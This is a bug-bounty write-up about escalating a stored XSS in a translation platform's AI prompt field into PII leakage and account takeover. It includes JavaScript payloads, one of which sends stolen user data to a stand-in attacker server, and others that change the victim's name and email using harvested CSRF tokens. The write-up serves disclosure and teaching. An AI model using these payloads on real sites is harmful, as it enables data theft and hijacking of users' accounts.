The vulnerabilities described in this article have been fixed. Please do not conduct unauthorized penetration testing.
Original source: https://sallam.gitbook.io/sec-88/write-ups/how-we-turned-a-medium-xss-into-a-high-bounty-by-bypassing-httponly-cookie
Content
The target application is a common website translation platform that includes team management, project management, and an AI feature module. During testing for privilege escalation and injection attacks, I discovered an interesting input field in the AI prompts module. There is a “select box” for choosing prompt types, but at the end of the list, there is an option to create a custom prompt type. This immediately caught my attention as it could serve as a vector for XSS attacks.
I tested the input field with standard XSS payloads and successfully triggered a stored XSS vulnerability.
However, there were two significant limitations:
1. The input field is limited to 255 characters, making it difficult to construct the payload.2. The session cookie is protected by the HttpOnly flag, preventing JavaScript from accessing it.
Despite these limitations, I submitted a vulnerability report, expecting it to be rated as medium severity due to the limited impact scope. The vulnerability grading team confirmed this assessment, noting that the HttpOnly flag reduced the risk of cookie theft, leaving only the potential threat of script execution.

Escalating Vulnerability Impact
I was not satisfied with the medium severity rating, so I began exploring ways to increase the impact of the vulnerability.
1. Expanding the Attack Surface
I discovered that the project could be set to public, significantly increasing the attack surface. If an attacker could lure other users to join their project and view the AI prompts, the XSS payload would trigger in all those users’ browsers.

While this did increase the potential impact, it was still not enough to convince the security team to classify the vulnerability as high severity.
2. Leaking Sensitive User Data
Next, I turned my attention to how to steal sensitive data. During testing, I found an endpoint <span><span>/backend/settings/change_account</span></span> exhibiting abnormal behavior: if an incomplete request is sent (for example, omitting the <span><span>X-CSRF-TOKEN</span></span> header or missing required parameters), the endpoint leaks all users’ personally identifiable information.
So now the challenge was how to construct an effective payload within the 255-character limit to exploit it.
After some attempts and with the help of AI to optimize the payload, I designed the following code:
fetch('/backend/settings/change_account') .then(r => r.json()) .then(d => location = 'https://attacker-server.com?data=' + encodeURIComponent(JSON.stringify(d))) .catch(console.error);
This payload forces the victim’s browser to send a request to the vulnerable endpoint, leaking all user data and sending it to my Burp Collaborator server.

3. Bypassing HttpOnly to Obtain CSRF Token
Although the session cookie is protected by the HttpOnly flag, I noticed that the CSRF token is stored in a non-HttpOnly cookie. This token is also included in the request headers for sensitive endpoints, such as the interface for changing user passwords.
By exploiting the XSS vulnerability, I could extract the CSRF token and use it to perform actions on behalf of the victim.
Here is an example of the payload I used to change the victim’s profile name:
<script>fetch('/backend/settings/change_account', { method: 'POST', headers: { 'X-Csrf-Token': 'fkel9z9je2', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'step=real_name&real_name=hacked+0x88'}).then(r => r.json()).then(console.log)</script>
This script uses the CSRF token obtained via XSS to successfully perform sensitive operations under the victim’s account.


4. Account Takeover
To further escalate the attack, my goal was to modify the victim’s email address to achieve complete account takeover.
However, the request to change the email requires an additional parameter <span><span>_token</span></span>, which is not stored in any cookie.
Upon investigation, I found that this <span><span>_token</span></span> is leaked in the HTML content of the victim’s profile page.
By sending a request to the profile endpoint and extracting the HTML, I was able to obtain the <span><span>_token</span></span> and use it in another XSS payload to modify the victim’s email:
<script>fetch('/api/front/user/change-email', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: '[email protected]&_token=tokeforvictim'}).then(r => r.json()).then(console.log)</script>
5. Other Exploitation Scenarios
In addition to account takeover, I also demonstrated other severe impacts that could result from the XSS vulnerability, including:
- Injecting malicious advertisements into the page.
- SEO manipulation—injecting backlinks to manipulate search engine rankings.
The security team ultimately reclassified the vulnerability as high severity and awarded me a larger bounty:

Training Consultation
linglongsec
SRC Vulnerability Mining Training
Linglong Security’s First SRC Vulnerability Mining Training
Linglong Security’s Second SRC Vulnerability Mining Training
Linglong Security’s Third SRC Vulnerability Mining Training
Linglong Security’s Fourth SRC Vulnerability Mining Training
Linglong Security’s Fifth SRC Vulnerability Mining Training
Linglong Security’s Sixth SRC Vulnerability Mining Training
Previous Article Shares
Remote Code Execution on Facebook Servers
Discovery and Retesting Case Analysis of a 2FA Bypass Vulnerability
Exploiting a $10,000 Vulnerability on Tesla Model 3
Hacking Chess.com and Obtaining 50 Million Customer Records
Using Cookie Sandwich to Steal HttpOnly Cookies
Remember, do not use alert(1) in XSS
Hacking the World’s Largest Airline and Hotel Rewards Platform
Huh? Who Hacked Me?? (Part 2)
Huh? Who Hacked Me?? (Part 1)
How Hackers Remotely Control Kia Cars Just by License Plate Number?
Hacking Subaru—Taking Over a Vehicle in 10 Seconds Just by License Plate Number
About to Fail? Then Hack the Academic Affairs System…
$100,000 Google Click Hijacking Vulnerability
Linglong Security Bilibili Open Class
https://space.bilibili.com/602205041
Linglong Security QQ Group
191400300